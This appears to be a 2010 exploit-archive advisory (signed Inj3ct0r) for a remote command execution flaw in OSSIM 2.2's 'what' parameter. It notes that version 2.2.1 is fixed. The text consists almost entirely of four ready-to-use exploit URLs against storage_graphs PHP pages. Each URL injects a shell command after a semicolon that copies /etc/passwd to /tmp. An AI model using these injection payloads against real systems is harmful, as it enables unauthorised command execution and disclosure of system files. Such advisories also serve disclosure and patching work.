OSSIM (what) Parameter Multiple Command Execution Vulnerabil
Posted on 18 March 2010
======================================================================== OSSIM 'what' Parameter Multiple Remote Command Execution Vulnerabilities ======================================================================== Vulnerable: OSSIM os-sim 2.2 Not Vulnerable: OSSIM os-sim 2.2.1 http://www.example.com/ossim/sem/storage_graphs.php?uniqueid=199&what=;cat /etc/passwd > /tmp/passwd; http://www.example.com/ossim/sem/storage_graphs2.php?uniqueid=199&what=;cat /etc/passwd > /tmp/passwd; http://www.example.com/ossim/sem/storage_graphs3.php?uniqueid=199&what=;cat /etc/passwd > /tmp/passwd; http://www.example.com/ossim/sem/storage_graphs4.php?uniqueid=199&what=;cat /etc/passwd > /tmp/passwd; # ~ - [ [ : Inj3ct0r : ] ]